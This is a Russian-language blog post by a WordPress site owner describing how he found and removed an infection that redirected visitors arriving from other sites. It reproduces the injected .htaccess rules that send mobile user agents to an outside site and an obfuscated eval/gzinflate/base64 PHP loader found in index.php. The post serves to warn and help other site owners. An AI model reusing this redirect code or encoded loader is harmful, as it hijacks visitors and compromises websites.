Сегодня случайно заметил что при переходе по ссылке на один из моих ресурсов открывается не мой сайт, а срабатывает редирект. Почесал репу почему так? Ведь если в браузере набрать имясайта.ру то открывалось всегда то что нужно. А вот если перейти по ссылке с другого сайта то открывалась opera123.net или operamo.net

Почесал репу в .htaccess нашел следущее:

RewriteEngine on
RewriteCond %{HTTP_ACCEPT} «text/vnd.wap.wml|application/vnd.wap.xhtml+xml» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «wapp|wapr|webc|winw|winw|xda|xda-» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «up.browser|up.link|windowssce|iemobile|mini|mmp» [NC,OR]
RewriteCond %{HTTP_USER_AGENT} «symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android» [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://ru-phone.com [L,R=302]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

нижние семь строчек созданы самим wordpressом а вот верхние не мои, удалил все кроме нижних семи проблема осталась все равно.

также посмотрел по датам изменения файлов нашел что последний раз менялся index.php в нем я нашел следущее:

<?php eval(«\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28′jVNtT9tADP4+af8hQxNtBW0hgQQEbKtKYPsyoQ72pYmqa2Kao/cSckebbt5/n9OkA7ROWiS/nv3YZ1/4vdNu5wXMJpLZJGu3+hZKG/UXKu0tWd5bSoEszwVPmOVaPR+UmZUi2iul6Bve2nc+vZ98C0ffw9G49fn29mYyGA7Dm9tW3HEQnVcFmCAsIFipOTKVFpqnyBZM2ZnGqWDJfApFscIpqEdMQAhMCp7MwWKqEy01gmBcAWY2QQ5ST7kA5HmmVSVYWrFHYjrFB1cCPhA26hwK1pNccZQ8zVFKIkolZnWhBUMFSReVnnOGOROSmGJGK55gnnHBc4N1CcNmINFkrMjRcOiikaywzZlWKzQrOeVMoe02vdFlnww+5VFvWuilgWKtC67muNApu68yaaS4hKk2uOQFCDAGy5RhqbXEHxa2z/iOrMngOvy6dc7SACuSDGX08fFiO8AovApH4YiyO87urvPudT5LuLLaZLQpoA2wekm0haUSmua85Ip0E3UlpJxF3VywFV1uRTuFEmdaz8T/NN5xfr5949BXc0gy7bTODS09tx8WrHAmByUcwsnFeCcqvWFUBl5U+kSBS/J0Z5/cwQHRUVS6jQxOa59/TCmX5Hdrf2UHJ03sFdkDokOy/Ua+gn6B6zbYmzPvGddv8NZEMd6gxq6oig2opnvZ9EOxflU3rHtxwxpr7busc7yr7Xeoeq3qu37T53HTC0nfr2LqUbxwbUI2vsBdh1Rde2E9zHWX/x6oF9Zm8GIm6znuxGf0Oz5JUHbcLGh8HMftjX4Q723Uw3gPVKJTuBt9GWqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ==’\x29\x29\x29\x3B»); ?>

что, как я понял остатки от вируса, удалил строку и все стало переходить нормально.

Быстро прочекать на зараженность вашего сайта можно по этой ссылке: http://www.virusdie.ru/index.php

Так что если Ваш сайт заражен вирусом быстренько идите лечиться.

Признаки заражения:

• просадка трафика;
• при переходе по вашей ссылке с другого сайта открывается все что угодно только не ваш сайт.

{code type=php}

{/code}